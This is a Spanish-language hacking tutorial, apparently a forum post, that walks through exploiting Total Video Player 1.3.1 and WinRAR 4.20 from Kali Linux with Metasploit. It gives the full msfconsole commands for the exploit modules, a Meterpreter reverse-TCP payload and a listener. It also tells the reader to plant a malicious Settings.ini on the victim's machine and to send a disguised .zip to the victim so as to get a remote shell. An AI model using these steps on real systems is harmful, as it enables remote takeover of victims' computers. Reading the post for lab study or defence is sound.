Exploit Total Video Player 1.31 y Winrar 4.20 (Explotando)





Cita:Estare usando exploit que han salido durante estos meses del año, sin duda estos meses a sido
uno de los mejores para los hacker


Explotando Total video Players 1.31


Este módulo Metasploit explota un desbordamiento de búfer en total Video Player 1.3.1. La vulnerabilidad se produce la apertura de archivos con formato incorrecto ejemplo Settings.ini "C: \ Archivos de programa \ Total Video Player \". Este módulo Metasploit ha sido probado con éxito en Windows WinXp-SP3-EN, Windows 7 y Windows 8.

Exploit Targets:

Total Video Player 1.3.1
Windows XP
Windows 7
Windows 8


Requisitos :

Atacante: kali Linux
Víctima PC: Windows 7


Descargar exploit:

Cita:http://www.exploit-db.com/exploits/31988/


Abrimos metasploit y usamos el exploit de total video player:



Cita:use exploit/windows/fileformat/total_video_player_ini_bof
msf exploit (total_video_player_ini_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (total_video_player_ini_bof)>set lhost 192.168.1.7 (IP Local )
msf exploit (total_video_player_ini_bof)>exploit




Se nos creara un archivo Settings.ini en la ruta señalada , este archivo es el que tenemos que copiar en la carpeta donde se instalo el programa total video player.



Copiamos el archivo el la ruta de instalacion:


Y reemplazamos por el archivo original:




Configuramos una conexion de escucha para que cuando la victima abra un video nos genere meterpreter:


Cita:use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.7
exploit


Ahora abrimos un video y listo meterpreter





Explotando Winrar 4.20



Una vulnerabilidad recientemente descubierta WinRAR por un investigador israelí está siendo explotado en una campaña de malware que parece tener como objetivo el gobierno y las organizaciones internacionales , así como de Fortune Global 500 , de acuerdo con la compañía de inteligencia cibernética IntelCrawler .

WinRAR es un programa popular que esencialmente comprime y descomprime archivos ZIP .

En una entrada de Domingo , Danor Cohen , investigador de seguridad de Israel , escribió acerca de una vulnerabilidad que permite a un individuo para crear un archivo ZIP que parece contener una cosa cuando se comprime , pero en realidad contiene algo totalmente diferente.

Desde el punto de vista de un atacante , que puede comprimir con eficacia un troyano , o algún otro tipo de malware , con WinRAR y hacer parecer que el archivo ZIP creado contiene una imagen, o algo que es inofensivo . El atacante espera a que alguien haga clic en el archivo, que en realidad es un ejecutable, y el objetivo queda comprometida.

Cohen observó la vulnerabilidad - que llamó WinRAR extensión de archivo spoofing - WinRAR en la versión 4.20 , pero los investigadores IntelCrawler escribió en un post el miércoles que se puede aprovechar en todas las versiones de WinRAR , incluyendo la versión 5.1 .


Exploit Targets:

WinRAR 4.20

Requisitos:

Atacante: kali Linux
Victima PC: Windows 7

Descargar Exploit:

Cita:http://www.exploit-db.com/exploits/32752/


Abrimos metasploit y usamos el exploit de winrar



Cita:use exploit/windows/fileformat/winrar_name_spoofing
msf exploit (winrar_name_spoofing)>set payload windows/meterpreter/reverse_tcp
msf exploit (winrar_name_spoofing)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (winrar_name_spoofing)>exploit



Se nos creara un archivo .zip en la ruta señala con un fichero txt solo hay que abrirlo y listo.



Se lo pasamos a la victima :



vemos que es un fichero .txt 


Configuramos una conexion de escucha y ahora lo abrimos y listo meterpreter.


Asi que cuidado con lo que descargues en internet.